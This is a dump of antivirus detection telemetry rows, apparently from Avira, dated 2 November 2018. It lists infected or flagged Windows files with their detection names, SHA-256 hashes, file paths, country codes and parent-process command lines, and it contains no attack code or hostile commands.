  Row(detection=Row(filename='trener.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\TRENER.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vctrainerplus9.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\VCTrainerPlus9\\VCTrainerPlus9.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='source.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\SOURCE\\SOURCE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gtavicetrn.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtavicetrn\\gtavicetrn.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='release.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\RELEASE\\RELEASE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='36c95d9779bd6d8905c73a1586949a1ec3a9b1b3952eb5994d70c74098504ff4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='371a4dc09057826ded411fbdd6671464d66341cf8d4871838d70a1b8d8ee65a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\371A4DC09057826DED411FBDD6671464D66341CF8D4871838D70A1B8D8EE65A4', filesize=4000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='371a4dc09057826ded411fbdd6671464d66341cf8d4871838d70a1b8d8ee65a4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:33:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='371a4dc09057826ded411fbdd6671464d66341cf8d4871838d70a1b8d8ee65a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\371A4DC09057826DED411FBDD6671464D66341CF8D4871838D70A1B8D8EE65A4', filesize=4000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='371a4dc09057826ded411fbdd6671464d66341cf8d4871838d70a1b8d8ee65a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:22:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105426-495d2471', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b872c6c\\AVSCAN-20181102-104924-1CD3574C\\AVSCAN-20181102-105426-495D2471', filesize=768000, name='TR/Drop.Agent.768000.1.#M1.#R1'), hash='3753b3b424847cb90dde4541fa7f7a0d5b0fc2417be35337c830b79ed5be0f3e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:54:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105512-501bb965', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b872c6c\\AVSCAN-20181102-104924-1CD3574C\\AVSCAN-20181102-105512-501BB965', filesize=768000, name='TR/Drop.Agent.768000.1.#M1.#R1'), hash='3753b3b424847cb90dde4541fa7f7a0d5b0fc2417be35337c830b79ed5be0f3e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:55:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\Apps\\DownloadNavigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='378e3c19e7cfcc8a5ea55ba2e8bf7e459b39eb818e4f7beb309c236a4b0c1f59', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:05:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskhost.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\Adobe\\taskhost.exe', filesize=768000, name='HEUR/AGEN.1000279.#M1.#R1'), hash='37a43fb439032768879b0aef3003edc11371363dc77d6a3670766387fc235272', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:30:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-114736-bc9594d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a16627ca\\AVSCAN-20181102-114624-AF9AF7BC\\AVSCAN-20181102-114736-BC9594D4', filesize=768000, name='SPR/Agent.37a43f.#M1.#R1'), hash='37a43fb439032768879b0aef3003edc11371363dc77d6a3670766387fc235272', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121212-c639de62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-121202-C4895C84\\AVSCAN-20181102-121212-C639DE62', filesize=768000, name='SPR/Agent.37a43f.#M1.#R1'), hash='37a43fb439032768879b0aef3003edc11371363dc77d6a3670766387fc235272', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskhost.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\Adobe\\taskhost.exe', filesize=768000, name='HEUR/AGEN.1000279.#M1.#R1'), hash='37a43fb439032768879b0aef3003edc11371363dc77d6a3670766387fc235272', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:JWJst0ZD+UmDpJ2+.1', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T04:42:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pmc01000.exe', filepath='C:\\NOVA PASTA\\MCPED10\\PMC01000.EXE', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='380182af6edc88fb2739fc56adc81b54ee8cc5c35c623785e12f6816c076014f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:56:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfcreatorsetup(1).exe', filepath='G:\\autres dossiers\\PC Eva\\ordinateur Eva\\Downloads\\PdfCreatorSetup(1).exe', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='38583d6da1a5ee97df361ff2b804765c341eccab1ffa133835c026adfb52073d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T14:05:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151319-d32816cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ca656e6\\AVSCAN-20181102-151220-C6FED76F\\AVSCAN-20181102-151319-D32816CD', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='38583d6da1a5ee97df361ff2b804765c341eccab1ffa133835c026adfb52073d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:13:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='torntv 2-bg.exe', filepath='\\\\?\\C:\\Windows.old\\Program Files\\Torntv 2\\Torntv 2-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='38a75b7396d53b515662130fec4490c372e85cfb06b7c2082bf721c3f4e77a8a', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='opp.dll', filepath='C:\\Program Files\\Adobe\\Photoshop 7.0\\OPP.dll', filesize=324000, name='W32/Ramnit.C.#M0.#R0'), hash='38ab6f24defb4d07089a31f303d17eb60b266579d6c6160fb63547c77870618b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T08:21:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000592a', filepath='C:\\Windows\\Temp\\tmp00005bb7\\tmp0000592a', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='38b2c463ce44c51483e7ca8725d161a7a52deab0dc10649a103735b617efa635', metadata=Row(cmdline='-k bdx -s scan', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T16:07:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='abrites commander for renault.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ABRITES software for ID 172243\\Renault\\ABRITES Commander for Renault.exe', filesize=52224000, name='HEUR/AGEN.1012543.#M1.#R1'), hash='38f60413f0bce0465d0d9bbf02e52b89da53e7e8fc7e546d7481ab1413e6a952', metadata=Row(cmdline=None, country='IE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092540-d936e9c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-092540-D936E9C1', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='39227ec741c01dff7028b6bb6747e6b5ce71f470b46ae34504d42db16f31fa70', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='392a83aaa63c27aa6710c4c7624bd9ddcbb735873c7c108d57dca9c5c679c5a5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064210-23dce2c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-064210-23DCE2C7', filesize=64000, name='HEUR/AGEN.1006519.#M1.#R1'), hash='399056504e511b370f54b9e31f3c52e6554f8e01d83e93eb29f4497816f09f3c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:44:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vctxd.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\VCTXD\\VCTXD.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='39937865052cb558fe82b0851e6c2a2d094007dd9fdbbd4904c79cca4a4d95a6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='txd.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\TXD\\TXD.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='39937865052cb558fe82b0851e6c2a2d094007dd9fdbbd4904c79cca4a4d95a6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta vice city user files.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA Vice City User Files\\GTA Vice City User Files.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='39937865052cb558fe82b0851e6c2a2d094007dd9fdbbd4904c79cca4a4d95a6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163003-34ddf425', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_745243a5\\AVSCAN-20181102-162207-F543B52C\\AVSCAN-20181102-163003-34DDF425', filesize=2048000, name='TR/Agent.39b6f0.#M1.#R1'), hash='39b6f02a1df8b0bba2337518dece3d290ff797c9ee759ccf88bdd097b0b1e9b0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:30:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:30:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:30:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kesner.vir', filepath='C:\\Program Files (x86)\\frets\\kesner.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='3a2b98eedcc298b7f342be65af38c0d6fdf16716d5cc9158ff9bf77bfce92b5a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6541008, timestamp='2018-11-02T17:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182343-e885acd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24503679\\AVSCAN-20181102-182309-E396501A\\AVSCAN-20181102-182343-E885ACD8', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='3a2b98eedcc298b7f342be65af38c0d6fdf16716d5cc9158ff9bf77bfce92b5a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074924-96f37ad9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-074924-96F37AD9', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:51:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3A5E26416CED265E1D0F270AC3B717E83A707A06EFE6655B6B3D89847A8B6610', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:20:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3A5E26416CED265E1D0F270AC3B717E83A707A06EFE6655B6B3D89847A8B6610', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:13:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3A5E26416CED265E1D0F270AC3B717E83A707A06EFE6655B6B3D89847A8B6610', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:25Z'), dt=datetime.date(2018, 11, 2)),
